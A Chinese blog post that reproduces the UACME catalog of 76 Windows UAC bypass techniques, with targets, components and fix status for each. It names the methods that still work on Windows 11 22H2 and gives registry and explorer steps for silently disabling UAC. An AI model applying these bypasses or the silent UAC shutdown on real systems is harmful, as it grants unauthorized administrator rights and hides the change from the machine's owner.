【UACME】在Win11上的发展
UACME 是一个收集各种已经公开的UAC Bypass方法的工具,在Github上开源。但是似乎作者最近没有及时更新他的方案说明。目前已公布的76中绕过UAC的方法如下:
注意:
(1)在Win11(22H2 22621.1105最新发布版)上,有些方法已经被修复,现在还能够在裸机上绕过UAC的方法序号为:33 41 43 53 59 61 62 70 73。在AV机器上,COM组件提权会被AV的Hook拦截,绕过方法为:被闲置的COM组件调用在恢复时会被过滤掉,***;注册表修改绕过UAC也会被AV查杀,绕过注册表监控的方法就是****。(防止被有心人利用,如必要研究可以轻松获知)
(2)注册表
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
下EnableLUA键值由1变为0时系统“安全与维护”弹出气球提示需要重启计算机来关闭用户账户控制,如何拦截弹窗?方法:在操作前关闭资源管理器,这个消息不是由安全与维护(操作中心)发出的,而是explorer自身发出的。修改后再重启explorer就不会监控该值是否为1了。然后修改ConsentPromptBehaviorAdmin键值为0,最后调用NtShutdownSystem或者ZwShutdownSystem重新启动即可完全关闭UAC。
1. Author: Leo Davidson
* Type: Dll Hijack
* Method: IFileOperation
* Target(s): \system32\sysprep\sysprep.exe
* Component(s): cryptbase.dll
* Implementation: ucmStandardAutoElevation
* Works from: Windows 7 (7600)
* Fixed in: Windows 8.1 (9600)
* How: sysprep.exe hardened LoadFrom manifest elements
* Code status: removed starting from v3.5.0 :tractor:
2. Author: Leo Davidson derivative
* Type: Dll Hijack
* Method: IFileOperation
* Target(s): \system32\sysprep\sysprep.exe
* Component(s): ShCore.dll
* Implementation: ucmStandardAutoElevation
* Works from: Windows 8.1 (9600)
* Fixed in: Windows 10 TP (> 9600)
* How: Side effect of ShCore.dll moving to \KnownDlls
* Code status: removed starting from v3.5.0 :tractor:
3. Author: Leo Davidson derivative by WinNT/Pitou
* Type: Dll Hijack
* Method: IFileOperation
* Target(s): \system32\oobe\setupsqm.exe
* Component(s): WdsCore.dll
* Implementation: ucmStandardAutoElevation
* Works from: Windows 7 (7600)
* Fixed in: Windows 10 TH2 (10558)
* How: Side effect of OOBE redesign
* Code status: removed starting from v3.5.0 :tractor:
4. Author: Jon Ericson, WinNT/Gootkit, mzH
* Type: AppCompat
* Method: RedirectEXE Shim
* Target(s): \system32\cliconfg.exe
* Component(s): -
* Implementation: ucmShimRedirectEXE
* Works from: Windows 7 (7600)
* Fixed in: Windows 10 TP (> 9600)
* How: Sdbinst.exe autoelevation removed, KB3045645/KB3048097 for rest Windows versions
* Code status: removed starting from v3.5.0 :tractor:
5. Author: WinNT/Simda
* Type: Elevated COM interface
* Method: ISecurityEditor
* Target(s): HKLM registry keys
* Component(s): -
* Implementation: ucmSimdaTurnOffUac
* Works from: Windows 7 (7600)
* Fixed in: Windows 10 TH1 (10147)
* How: ISecurityEditor interface method changed
* Code status: removed starting from v3.5.0 :tractor:
6. Author: Win32/Carberp
* Type: Dll Hijack
* Method: WUSA
* Target(s): \ehome\mcx2prov.exe, \system32\migwiz\migwiz.exe
* Component(s): WdsCore.dll, CryptBase.dll, CryptSP.dll
* Implementation: ucmWusaMethod
* Works from: Windows 7 (7600)
* Fixed in: Windows 10 TH1 (10147)
* How: WUSA /extract option removed
* Code status: removed starting from v3.5.0 :tractor:
7. Author: Win32/Carberp derivative
* Type: Dll Hijack
* Method: WUSA
* Target(s): \system32\cliconfg.exe
* Component(s): ntwdblib.dll
* Implementation: ucmWusaMethod
* Works from: Windows 7 (7600)
* Fixed in: Windows 10 TH1 (10147)
* How: WUSA /extract option removed
* Code status: removed starting from v3.5.0 :tractor:
8. Author: Leo Davidson derivative by Win32/Tilon
* Type: Dll Hijack
* Method: IFileOperation
* Target(s): \system32\sysprep\sysprep.exe
* Component(s): Actionqueue.dll
* Implementation: ucmStandardAutoElevation
* Works from: Windows 7 (7600)
* Fixed in: Windows 8.1 (9600)
* How: sysprep.exe hardened LoadFrom manifest
* Code status: removed starting from v3.5.0 :tractor:
9. Author: Leo Davidson, WinNT/Simda, Win32/Carberp derivative
* Type: Dll Hijack
* Method: IFileOperation, ISecurityEditor, WUSA
* Target(s): IFEO registry keys, \system32\cliconfg.exe
* Component(s): Attacker defined Application Verifier Dll
* Implementation: ucmAvrfMethod
* Works from: Windows 7 (7600)
* Fixed in: Windows 10 TH1 (10147)
* How: WUSA /extract option removed, ISecurityEditor interface method changed
* Code status: removed starting from v3.5.0 :tractor:
10. Author: WinNT/Pitou, Win32/Carberp derivative
* Type: Dll Hijack
* Method: IFileOperation, WUSA
* Target(s): \system32\\{New}or{Existing}\\{autoelevated}.exe, e.g. winsat.exe
* Component(s): Attacker defined dll, e.g. PowProf.dll, DevObj.dll
* Implementation: ucmWinSATMethod
* Works from: Windows 7 (7600)
* Fixed in: Windows 10 TH2 (10548)
* How: AppInfo elevated application path control hardening
* Code status: removed starting from v3.5.0 :tractor:
11. Author: Jon Ericson, WinNT/Gootkit, mzH
* Type: AppCompat
* Method: Shim Memory Patch
* Target(s): \system32\iscsicli.exe
* Component(s): Attacker prepared shellcode
* Implementation: ucmShimPatch
* Works from: Windows 7 (7600)
* Fixed in: Windows 8.1 (9600)
* How: Sdbinst.exe autoelevation removed, KB3045645/KB3048097 for rest Windows versions
* Code status: removed starting from v3.5.0 :tractor:
12. Author: Leo Davidson derivative
* Type: Dll Hijack
* Method: IFileOperation
* Target(s): \system32\sysprep\sysprep.exe
* Component(s): dbgcore.dll
* Implementation: ucmStandardAutoElevation
* Works from: Windows 10 TH1 (10240)
* Fixed in: Windows 10 TH2 (10565)
* How: sysprep.exe manifest updated
* Code status: removed starting from v3.5.0 :tractor:
13. Author: Leo Davidson derivative
* Type: Dll Hijack
* Method: IFileOperation
* Target(s): \system32\mmc.exe EventVwr.msc
* Component(s): elsext.dll
* Implementation: ucmMMCMethod
* Works from: Windows 7 (7600)
* Fixed in: Windows 10 RS1 (14316)
* How: Missing dependency removed
* Code status: removed starting from v3.5.0 :tractor:
14. Author: Leo Davidson, WinNT/Sirefef derivative
* Type: Dll Hijack
* Method: IFileOperation
* Target(s): \system\credwiz.exe, \system32\wbem\oobe.exe
* Component(s): netutils.dll
* Implementation: ucmSirefefMethod
* Works from: Windows 7 (7600)
* Fixed in: Windows 10 TH2 (10548)
* How: AppInfo elevated application path control hardening
* Code status: removed starting from v3.5.0 :tractor:
15. Author: Leo Davidson, Win32/Addrop, Metasploit derivative
* Type: Dll Hijack
* Method: IFileOperation
* Target(s): \system32\cliconfg.exe
* Component(s): ntwdblib.dll
* Implementation: ucmGenericAutoelevation
* Works from: Windows 7 (7600)
* Fixed in: Windows 10 RS1 (14316)
* How: Cliconfg.exe autoelevation removed
* Code status: removed starting from v3.5.0 :tractor:
16. Author: Leo Davidson derivative
* Type: Dll Hijack
* Method: IFileOperation
* Target(s): \system32\GWX\GWXUXWorker.exe, \system32\inetsrv\inetmgr.exe
* Component(s): SLC.dll
* Implementation: ucmGWX
* Works from: Windows 7 (7600)
* Fixed in: Windows 10 RS1 (14316)
* How: AppInfo elevated application path control and inetmgr executable hardening
* Code status: removed starting from v3.5.0 :tractor:
17. Author: Leo Davidson derivative
* Type: Dll Hijack (Import forwarding)
* Method: IFileOperation
* Target(s): \system32\sysprep\sysprep.exe
* Component(s): unbcl.dll
* Implementation: ucmStandardAutoElevation2
* Works from: Windows 8.1 (9600)
* Fixed in: Windows 10 RS1 (14371)
* How: sysprep.exe manifest updated
* Code status: removed starting from v3.5.0 :tractor:
18. Author: Leo Davidson derivative
* Type: Dll Hijack (Manifest)
* Method: IFileOperation
* Target(s): \system32\taskhost.exe, \system32\tzsync.exe (any ms exe without manifest)
* Component(s): Attacker defined
* Implementation: ucmAutoElevateManifest
* Works from: Windows 7 (7600)
* Fixed in: Windows 10 RS1 (14371)
* How: Manifest parsing logic reviewed
* Code status: removed starting from v3.5.0 :tractor:
19. Author: Leo Davidson derivative
* Type: Dll Hijack
* Method: IFileOperation
* Target(s): \system32\inetsrv\inetmgr.exe
* Component(s): MsCoree.dll
* Implementation: ucmInetMgrMethod
* Works from: Windows 7 (7600)
* Fixed in: Windows 10 RS1 (14376)
* How: inetmgr.exe executable manifest hardening, MitigationPolicy->ProcessImageLoadPolicy->PreferSystem32Images
* Code status: removed starting from v3.5.0 :tractor:
20. Author: Leo Davidson derivative
* Type: Dll Hijack
* Method: IFileOperation
* Target(s): \system32\mmc.exe, Rsop.msc
* Component(s): WbemComn.dll
* Implementation: ucmMMCMethod
* Works from: Windows 7 (7600)
* Fixed in: Windows 10 RS3 (16232)
* How: Target requires wbemcomn.dll to be signed by MS
* Code status: removed starting from v3.5.0 :tractor:
21. Author: Leo Davidson derivative
* Type: Dll Hijack
* Method: IFileOperation, SxS DotLocal
* Target(s): \system32\sysprep\sysprep.exe
* Component(s): comctl32.dll
* Implementation: ucmSXSMethod
* Works from: Windows 7 (7600)
* Fixed in: Windows 10 RS3 (16232)
* How: MitigationPolicy->ProcessImageLoadPolicy->PreferSystem32Images
* Code status: removed starting from v3.5.0 :tractor:
22. Author: Leo Davidson derivative
* Type: Dll Hijack
* Method: IFileOperation, SxS DotLocal
* Target(s): \system32\consent.exe
* Component(s): comctl32.dll
* Implementation: ucmSXSMethod
* Works from: Windows 7 (7600)
* Fixed in: unfixed :see_no_evil:
* How: -
* Code status: added in v2.5.0
23. Author: Leo Davidson derivative
* Type: Dll Hijack
* Method: IFileOperation
* Target(s): \system32\pkgmgr.exe
* Component(s): DismCore.dll
* Implementation: ucmDismMethod
* Works from: Windows 7 (7600)
* Fixed in: unfixed :see_no_evil:
* How: -
* Code status: added in v2.5.1
24. Author: BreakingMalware
* Type: Shell API
* Method: Environment variables expansion
* Target(s): \system32\CompMgmtLauncher.exe
* Component(s): Attacker defined
* Implementation: ucmCometMethod
* Works from: Windows 7 (7600)
* Fixed in: Windows 10 RS2 (15031)
* How: CompMgmtLauncher.exe autoelevation removed
* Code status: removed starting from v3.5.0 :tractor:
25. Author: Enigma0x3
* Type: Shell API
* Method: Registry key manipulation
* Target(s): \system32\EventVwr.exe, \system32\CompMgmtLauncher.exe
* Component(s): Attacker defined
* Implementation: ucmHijackShellCommandMethod
* Works from: Windows 7 (7600)
* Fixed in: Windows 10 RS2 (15031)
* How: EventVwr.exe redesigned, CompMgmtLauncher.exe autoelevation removed
* Code status: removed starting from v3.5.0 :tractor:
26. Author: Enigma0x3
* Type: Race Condition
* Method: File overwrite
* Target(s): %temp%\GUID\dismhost.exe
* Component(s): LogProvider.dll
* Implementation: ucmDiskCleanupRaceCondition
* Works from: Windows 10 TH1 (10240)
* AlwaysNotify compatible
* Fixed in: Windows 10 RS2 (15031)
* How: File security permissions altered
* Code status: removed starting from v3.5.0 :tractor:
27. Author: ExpLife
* Type: Elevated COM interface
* Method: IARPUninstallStringLauncher
* Target(s): Attacker defined
* Component(s): Attacker defined
* Implementation: ucmUninstallLauncherMethod
* Works from: Windows 7 (7600)
* Fixed in: Windows 10 RS3 (16199)
* How: UninstallStringLauncher interface removed from COMAutoApprovalList
* Code status: removed starting from v3.5.0 :tractor:
28. Author: Exploit/Sandworm
* Type: Whitelisted component
* Method: InfDefaultInstall
* Target(s): Attacker defined
* Component(s): Attacker defined
* Implementation: ucmSandwormMethod
* Works from: Windows 7 (7600)
* Fixed in: Windows 8.1 (9600)
* How: InfDefaultInstall.exe removed from g_lpAutoApproveEXEList (MS14-060)
* Code status: removed starting from v3.5.0 :tractor:
29. Author: Enigma0x3
* Type: Shell API
* Method: Registry key manipulation
* Target(s): \system32\sdclt.exe
* Component(s): Attacker defined
* Implementation: ucmAppPathMethod
* Works from: Windows 10 TH1 (10240)
* Fixed in: Windows 10 RS3 (16215)
* How: Shell API update
* Code status: removed starting from v3.5.0 :tractor:
30. Author: Leo Davidson derivative, lhc645
* Type: Dll Hijack
* Method: WOW64 logger
* Target(s): \syswow64\\{any elevated exe, e.g wusa.exe}
* Component(s): wow64log.dll
* Implementation: ucmWow64LoggerMethod
* Works from: Windows 7 (7600)
* Fixed in: unfixed :see_no_evil:
* How: -
* Code status: added in v2.7.0
31. Author: Enigma0x3
* Type: Shell API
* Method: Registry key manipulation
* Target(s): \system32\sdclt.exe
* Component(s): Attacker defined
* Implementation: ucmSdcltIsolatedCommandMethod
* Works from: Windows 10 TH1 (10240)
* Fixed in: Windows 10 RS4 (17025)
* How: Shell API / Windows components update
* Code status: removed starting from v3.5.0 :tractor:
32. Author: xi-tauw
* Type: Dll Hijack
* Method: UIPI bypass with uiAccess application
* Target(s): \Program Files\Windows Media Player\osk.exe, \system32\EventVwr.exe, \system32\mmc.exe
* Component(s): duser.dll, osksupport.dll
* Implementation: ucmUiAccessMethod
* Works from: Windows 7 (7600)
* Fixed in: unfixed :see_no_evil:
* How: -
* Code status: added in v2.7.1
33. Author: winscripting.blog
* Type: Shell API
* Method: Registry key manipulation
* Target(s): \system32\fodhelper.exe
* Component(s): Attacker defined
* Implementation: ucmShellRegModMethod
* Works from: Windows 10 TH1 (10240)
* Fixed in: unfixed :see_no_evil:
* How: -
* Code status: added in v2.7.2
34. Author: James Forshaw
* Type: Shell API
* Method: Environment variables expansion
* Target(s): \system32\svchost.exe via \system32\schtasks.exe
* Component(s): Attacker defined
* Implementation: ucmDiskCleanupEnvironmentVariable
* Works from: Windows 8.1 (9600)
* AlwaysNotify compatible
* Fixed in: unfixed :see_no_evil:
* How: -
* Code status: added in v2.7.2
35. Author: CIA & James Forshaw
* Type: Impersonation
* Method: Token Manipulations
* Target(s): Autoelevated applications
* Component(s): Attacker defined
* Implementation: ucmTokenModification
* Works from: Windows 7 (7600)
* AlwaysNotify compatible, see note
* Fixed in: Windows 10 RS5 (17686)
* How: ntoskrnl.exe->SeTokenCanImpersonate additional access token check added
* Code status: removed starting from v3.5.0 :tractor:
36. Author: Thomas Vanhoutte aka SandboxEscaper
* Type: Race condition
* Method: NTFS reparse point & Dll Hijack
* Target(s): wusa.exe, pkgmgr.exe
* Component(s): Attacker defined
* Implementation: ucmJunctionMethod
* Works from: Windows 7 (7600)
* Fixed in: unfixed :see_no_evil:
* How: -
* Code status: added in v2.7.4
37. Author: Ernesto Fernandez, Thomas Vanhoutte
* Type: Dll Hijack
* Method: SxS DotLocal, NTFS reparse point
* Target(s): \system32\dccw.exe
* Component(s): GdiPlus.dll
* Implementation: ucmSXSDccwMethod
* Works from: Windows 7 (7600)
* Fixed in: unfixed :see_no_evil:
* How: -
* Code status: added in v2.7.5
38. Author: Clement Rouault
* Type: Whitelisted component
* Method: APPINFO command line spoofing
* Target(s): \system32\mmc.exe
* Component(s): Attacker defined
* Implementation: ucmHakrilMethod
* Works from: Windows 7 (7600)
* Fixed in: unfixed :see_no_evil:
* How: -
* Code status: added in v2.7.6
39. Author: Stefan Kanthak
* Type: Dll Hijack
* Method: .NET Code Profiler
* Target(s): \system32\mmc.exe
* Component(s): Attacker defined
* Implementation: ucmCorProfilerMethod
* Works from: Windows 7 (7600)
* Fixed in: unfixed :see_no_evil:
* How: -
* Code status: added in v2.7.7
40. Author: Ruben Boonen
* Type: COM Handler Hijack
* Method: Registry key manipulation
* Target(s): \system32\mmc.exe, \system32\recdisc.exe
* Component(s): Attacker defined
* Implementation: ucmCOMHandlersMethod
* Works from: Windows 7 (7600)
* Fixed in: Windows 10 19H1 (18362)
* How: Side effect of Windows changes
* Code status: removed starting from v3.5.0 :tractor:
41. Author: Oddvar Moe
* Type: Elevated COM interface
* Method: ICMLuaUtil
* Target(s): Attacker defined
* Component(s): Attacker defined
* Implementation: ucmCMLuaUtilShellExecMethod
* Works from: Windows 7 (7600)
* Fixed in: unfixed :see_no_evil:
* How: -
* Code status: added in v2.7.9
42. Author: BreakingMalware and Enigma0x3
* Type: Elevated COM interface
* Method: IFwCplLua
* Target(s): Attacker defined
* Component(s): Attacker defined
* Implementation: ucmFwCplLuaMethod
* Works from: Windows 7 (7600)
* Fixed in: Windows 10 RS4 (17134)
* How: Shell API update
* Code status: removed starting from v3.5.0 :tractor:
43. Author: Oddvar Moe derivative
* Type: Elevated COM interface
* Method: IColorDataProxy, ICMLuaUtil
* Target(s): Attacker defined
* Component(s): Attacker defined
* Implementation: ucmDccwCOMMethod
* Works from: Windows 7 (7600)
* Fixed in: unfixed :see_no_evil:
* How: -
* Code status: added in v2.8.3
44. Author: bytecode77
* Type: Shell API
* Method: Environment variables expansion
* Target(s): Multiple auto-elevated processes
* Component(s): Various per target
* Implementation: ucmVolatileEnvMethod
* Works from: Windows 7 (7600)
* Fixed in: Windows 10 RS3 (16299)
* How: Current user system directory variables ignored during process creation
* Code status: removed starting from v3.5.0 :tractor:
45. Author: bytecode77
* Type: Shell API
* Method: Registry key manipulation
* Target(s): \system32\slui.exe
* Component(s): Attacker defined
* Implementation: ucmSluiHijackMethod
* Works from: Windows 8.1 (9600)
* Fixed in: Windows 10 20H1 (19041)
* How: Side effect of Windows changes
* Code status: removed starting from v3.5.0 :tractor:
46. Author: Anonymous
* Type: Race Condition
* Method: Registry key manipulation
* Target(s): \system32\BitlockerWizardElev.exe
* Component(s): Attacker defined
* Implementation: ucmBitlockerRCMethod
* Works from: Windows 7 (7600)
* Fixed in: Windows 10 RS4 (>16299)
* How: Shell API update
* Code status: removed starting from v3.5.0 :tractor:
47. Author: clavoillotte & 3gstudent
* Type: COM Handler Hijack
* Method: Registry key manipulation
* Target(s): \system32\mmc.exe
* Component(s): Attacker defined
* Implementation: ucmCOMHandlersMethod2
* Works from: Windows 7 (7600)
* Fixed in: Windows 10 19H1 (18362)
* How: Side effect of Windows changes
* Code status: removed starting from v3.5.0 :tractor:
48. Author: deroko
* Type: Elevated COM interface
* Method: ISPPLUAObject
* Target(s): Attacker defined
* Component(s): Attacker defined
* Implementation: ucmSPPLUAObjectMethod
* Works from: Windows 7 (7600)
* Fixed in: Windows 10 RS5 (17763)
* How: ISPPLUAObject interface method changed
* Code status: removed starting from v3.5.0 :tractor:
49. Author: RinN
* Type: Elevated COM interface
* Method: ICreateNewLink
* Target(s): \system32\TpmInit.exe
* Component(s): WbemComn.dll
* Implementation: ucmCreateNewLinkMethod
* Works from: Windows 7 (7600)
* Fixed in: Windows 10 RS1 (14393)
* How: Side effect of consent.exe COMAutoApprovalList introduction
* Code status: removed starting from v3.5.0 :tractor:
50. Author: Anonymous
* Type: Elevated COM interface
* Method: IDateTimeStateWrite, ISPPLUAObject
* Target(s): w32time service
* Component(s): w32time.dll
* Implementation: ucmDateTimeStateWriterMethod
* Works from: Windows 7 (7600)
* Fixed in: Windows 10 RS5 (17763)
* How: Side effect of ISPPLUAObject interface change
* Code status: removed starting from v3.5.0 :tractor:
51. Author: bytecode77 derivative
* Type: Elevated COM interface
* Method: IAccessibilityCplAdmin
* Target(s): \system32\rstrui.exe
* Component(s): Attacker defined
* Implementation: ucmAcCplAdminMethod
* Works from: Windows 7 (7600)
* Fixed in: Windows 10 RS4 (17134)
* How: Shell API update
* Code status: removed starting from v3.5.0 :tractor:
52. Author: David Wells
* Type: Whitelisted component
* Method: AipNormalizePath parsing abuse
* Target(s): Attacker defined
* Component(s): Attacker defined
* Implementation: ucmDirectoryMockMethod
* Works from: Windows 7 (7600)
* Fixed in: unfixed :see_no_evil:
* How: -
* Code status: added in v3.0.4
53. Author: Emeric Nasi
* Type: Shell API
* Method: Registry key manipulation
* Target(s): \system32\sdclt.exe
* Component(s): Attacker defined
* Implementation: ucmShellRegModMethod
* Works from: Windows 10 (14393)
* Fixed in: unfixed :see_no_evil:
* How: -
* Code status: added in v3.1.3
54. Author: egre55
* Type: Dll Hijack
* Method: Dll path search abuse
* Target(s): \syswow64\SystemPropertiesAdvanced.exe and other SystemProperties*.exe
* Component(s): \AppData\Local\Microsoft\WindowsApps\srrstr.dll
* Implementation: ucmEgre55Method
* Works from: Windows 10 (14393)
* Fixed in: Windows 10 19H1 (18362)
* How: SysDm.cpl!_CreateSystemRestorePage has been updated for secured load library call
* Code status: removed starting from v3.5.0 :tractor:
55. Author: James Forshaw
* Type: GUI Hack
* Method: UIPI bypass with token modification
* Target(s): \system32\osk.exe, \system32\msconfig.exe
* Component(s): Attacker defined
* Implementation: ucmTokenModUIAccessMethod
* Works from: Windows 7 (7600)
* Fixed in: unfixed :see_no_evil:
* How: -
* Code status: added in v3.1.5
56. Author: Hashim Jawad
* Type: Shell API
* Method: Registry key manipulation
* Target(s): \system32\WSReset.exe
* Component(s): Attacker defined
* Implementation: ucmShellRegModMethod2
* Works from: Windows 10 (17134)
* Fixed in: Windows 11 (22000)
* How: Windows components redesign
* Code status: removed starting from v3.5.7 :tractor:
57. Author: Leo Davidson derivative by Win32/Gapz
* Type: Dll Hijack
* Method: IFileOperation
* Target(s): \system32\sysprep\sysprep.exe
* Component(s): unattend.dll
* Implementation: ucmStandardAutoElevation
* Works from: Windows 7 (7600)
* Fixed in: Windows 8.1 (9600)
* How: sysprep.exe hardened LoadFrom manifest elements
* Code status: removed starting from v3.5.0 :tractor:
58. Author: RinN
* Type: Elevated COM interface
* Method: IEditionUpgradeManager
* Target(s): \system32\clipup.exe
* Component(s): Attacker defined
* Implementation: ucmEditionUpgradeManagerMethod
* Works from: Windows 10 (14393)
* Fixed in: unfixed :see_no_evil:
* How: -
* Code status: added in v3.2.0
59. Author: James Forshaw
* Type: AppInfo ALPC
* Method: RAiLaunchAdminProcess and DebugObject
* Target(s): Attacker defined
* Component(s): Attacker defined
* Implementation: ucmDebugObjectMethod
* Works from: Windows 7 (7600)
* Fixed in: unfixed :see_no_evil:
* How: -
* Code status: added in v3.2.3
60. Author: Enigma0x3 derivative by WinNT/Glupteba
* Type: Shell API
* Method: Registry key manipulation
* Target(s): \system32\CompMgmtLauncher.exe
* Component(s): Attacker defined
* Implementation: ucmGluptebaMethod
* Works from: Windows 7 (7600)
* Fixed in: Windows 10 RS2 (15063)
* How: CompMgmtLauncher.exe autoelevation removed
* Code status: removed starting from v3.5.0 :tractor:
61. Author: Enigma0x3/bytecode77 derivative by Nassim Asrir
* Type: Shell API
* Method: Registry key manipulation
* Target(s): \system32\slui.exe, \system32\changepk.exe
* Component(s): Attacker defined
* Implementation: ucmShellRegModMethod
* Works from: Windows 10 (14393)
* Fixed in: unfixed :see_no_evil:
* How: -
* Code status: added in v3.2.5
62. Author: winscripting.blog
* Type: Shell API
* Method: Registry key manipulation
* Target(s): \system32\computerdefaults.exe
* Component(s): Attacker defined
* Implementation: ucmShellRegModMethod
* Works from: Windows 10 RS4 (17134)
* Fixed in: unfixed :see_no_evil:
* How: -
* Code status: added in v3.2.6
63. Author: Arush Agarampur
* Type: Dll Hijack
* Method: ISecurityEditor
* Target(s): Native Image Cache elements
* Component(s): Attacker defined
* Implementation: ucmNICPoisonMethod
* Works from: Windows 7 (7600)
* Fixed in: unfixed :see_no_evil:
* How: -
* Code status: added in v3.2.7
64. Author: Arush Agarampur
* Type: Elevated COM interface
* Method: IIEAxiAdminInstaller, IIEAxiInstaller2, IFileOperation
* Target(s): IE add-on install cache
* Component(s): Attacker defined
* Implementation: ucmIeAddOnInstallMethod
* Works from: Windows 7 (7600)
* Fixed in: unfixed :see_no_evil:
* How: -
* Code status: added in v3.5.1
65. Author: Arush Agarampur
* Type: Elevated COM interface
* Method: IWscAdmin
* Target(s): Shell Protocol Hijack
* Component(s): Attacker defined
* Implementation: ucmWscActionProtocolMethod
* Works from: Windows 7 (7600)
* Fixed in: unfixed :see_no_evil:
* How: -
* Code status: added in v3.5.2
66. Author: Arush Agarampur
* Type: Elevated COM interface
* Method: IFwCplLua, Shell Protocol Hijack
* Target(s): Shell protocol registry entry and environment variables
* Component(s): Attacker defined
* Implementation: ucmFwCplLuaMethod2
* Works from: Windows 7 (7600)
* Fixed in: unfixed :see_no_evil:
* How: -
* Code status: added in v3.5.3
67. Author: Arush Agarampur
* Type: Shell API
* Method: Shell Protocol Hijack
* Target(s): \system32\fodhelper.exe
* Component(s): Attacker defined
* Implementation: ucmMsSettingsProtocolMethod
* Works from: Windows 10 TH1 (10240)
* Fixed in: unfixed :see_no_evil:
* How: -
* Code status: added in v3.5.4
68. Author: Arush Agarampur
* Type: Shell API
* Method: Shell Protocol Hijack
* Target(s): \system32\wsreset.exe
* Component(s): Attacker defined
* Implementation: ucmMsStoreProtocolMethod
* Works from: Windows 10 RS5 (17763)
* Fixed in: unfixed :see_no_evil:
* How: -
* Code status: added in v3.5.5
69. Author: Arush Agarampur
* Type: Shell API
* Method: Environment variables expansion, Dll Hijack
* Target(s): \system32\taskhostw.exe
* Component(s): pcadm.dll
* Implementation: ucmPcaMethod
* Works from: Windows 7 (7600)
* AlwaysNotify compatible
* Fixed in: unfixed :see_no_evil:
* How: -
* Code status: added in v3.5.6
70. Author: V3ded
* Type: Shell API
* Method: Registry key manipulation
* Target(s): \system32\fodhelper.exe, \system32\computerdefaults.exe
* Component(s): Attacker defined
* Implementation: ucmShellRegModMethod3
* Works from: Windows 10 (10240)
* Fixed in: unfixed :see_no_evil:
* How: -
* Code status: added in v3.5.7
71. Author: Arush Agarampur
* Type: Dll Hijack
* Method: ISecurityEditor
* Target(s): Native Image Cache elements
* Component(s): Attacker defined
* Implementation: ucmNICPoisonMethod2
* Works from: Windows 7 RTM (7600)
* Fixed in: unfixed :see_no_evil:
* How: -
* Code status: added in v3.5.8
72. Author: Emeric Nasi
* Type: Dll Hijack
* Method: Dll path search abuse
* Target(s): \syswow64\msdt.exe, \system32\sdiagnhost.exe
* Component(s): BluetoothDiagnosticUtil.dll
* Implementation: ucmMsdtMethod
* Works from: Windows 10 (10240)
* Fixed in: unfixed :see_no_evil:
* How: -
* Code status: added in v3.5.9
73. Author: orange_8361 and antonioCoco
* Type: Shell API
* Method: .NET deserialization
* Target(s): \system32\mmc.exe EventVwr.msc
* Component(s): Attacker defined
* Implementation: ucmDotNetSerialMethod
* Works from: Windows 7 RTM (7600)
* Fixed in: unfixed :see_no_evil:
* How: -
* Code status: added in v3.6.0
74. Author: zcgonvh
* Type: Elevated COM interface
* Method: IElevatedFactoryServer
* Target(s): Attacker defined
* Component(s): Attacker defined
* Implementation: ucmVFServerTaskSchedMethod
* Works from: Windows 8.1 (9600)
* Fixed in: unfixed :see_no_evil:
* How: -
* Code status: added in v3.6.1
75. Author: zcgonvh derivative by Wh04m1001
* Type: Elevated COM interface
* Method: IDiagnosticProfile
* Target(s): Attacker defined
* Component(s): Attacker defined
* Implementation: ucmVFServerDiagProfileMethod
* Works from: Windows 7 RTM (7600)
* Fixed in: unfixed :see_no_evil:
* How: -
* Code status: added in v3.6.2
76. Author: HackerHouse
* Type: Dll Hijack
* Method: Dll path search abuse, Registry key manipulation
* Target(s): \syswow64\iscsicpl.exe
* Component(s): iscsiexe.dll
* Implementation: ucmIscsiCplMethod
* Works from: Windows 7 RTM (7600)
* Fixed in: unfixed :see_no_evil:
* How: -
* Code status: added in v3.6.3
附件:UACME项目地址:hfiref0x/UACME: Defeating Windows User Account Control (github.com)https://github.com/hfiref0x/UACME
------------------------
关注我的博客:涟幽516
转载请注明来源:UACME在Win11上的发展--http://t.csdn.cn/lRmFP
【UACME】在Win11上的发展相关推荐
- 中国人工智能学会通讯——艺术与人工智能的明天——人机信任合作 一、人工智能在艺术上的发展...
今天非常开心有这个机会,让我谈一下未来人工智能对于人类艺术方面的结合.我今天探讨的中心是人机的信任合作,我相信这是艺术与人工智能的明天. 去年,AlphaGO基本上实现了全机器性质的计算学习,打败了人 ...
- 如何在Win11上快速加密硬盘 Win11上快速加密硬盘方法步骤
如何在Win11上快速加密硬盘?我们在使用电脑的时候,会把很多的文件.数据存储在电脑硬盘中,但是有很多重要的文件放在其中,不想让其他人看到,这时我们可以给硬盘加密,但是有很多用户不知道如何操作,下面和 ...
- 如何修复Win11上的时钟不同步?Win11时钟不同步修复方法
如何修复Win11上的时钟不同步?在Windows11上,关键是要有一个准确的为设备配置的时间以避免连接在线服务和应用程序时出现问题,因为系统依赖此信息来确保安全并正常运行.下面小编为大家带来两种时钟 ...
- 【新手教程】如何在Win11上制作一个模仿MacOS的桌面?
起因是早上蹲坑的时候偶然间在小红书上刷到一篇文章,看了下效果图感觉还不错,所以按照文章作者的流程来了一遍.过程中也遇到了一些小问题,正好放假了有空就写一篇文章记录一下.先放一下效果: 1. 创建下方D ...
- 如何在win11上运行VC6.0
说明:win11是在win10的基础上开发的不完全 体,VC6.0在win11上不能正常运行. 方法: 1.下载安装软件 安装包链接:https://pan.baidu.com/ ...
- 国泰君安国际携手蔚来与宁德时代,助力新能源汽车电池产业创新发展做优、做强基础上突破发展,以金融支持实体经济
香港--(美国商业资讯)--国泰君安国际控股有限公司(「国泰君安国际」或「公司」,与其附属公司称为「集团」,股份代号:1788.HK)宣布,集团将携手蔚来汽车(「蔚来」).宁德时代新能源科技股份有限公 ...
- 长乐外海风电场创新应用,推动全球智慧海上风电发展
长乐外海C区风电场共有风力发电机组57台,场址中心离岸距离约 45 公里,水深最深达近 50 米. 在全球海上风电行业中,此海上风电场首次大面积采用了吸力桩导管架基础结构形式. 永福股份开展了可行性研 ...
- WIN11上怎么打开epub类型文件
EPUB由国际数字出版平台创建并推广,它是一种开源格式,自从它被设计为可回流数字内容的XML格式之后,它很快在各大出版社中流行起来.它有多种用途,包括数字报纸.行业协会期刊和用户手册,因此很快成为当下 ...
- 我不厉害,只是走上了发展的快车道
亲爱的学员,欢迎来到子桓私塾. 天生我材必有用.每个人都有自己的潜能,每个人的职场发展都可以更好.但能不能走上职场的快车道,取决于是否有合理的方法. 职场的快速发展,和我们的能力息息相关.比如,你的家 ...
最新文章
- hibernate要点
- JZOJ 5167. 【NOIP2017模拟6.26】下蛋爷
- aqs java 简书,Java AQS源码解读
- 【C语言】C语言里++能随便用吗?
- JavaScript 基础 数据类型与运算符
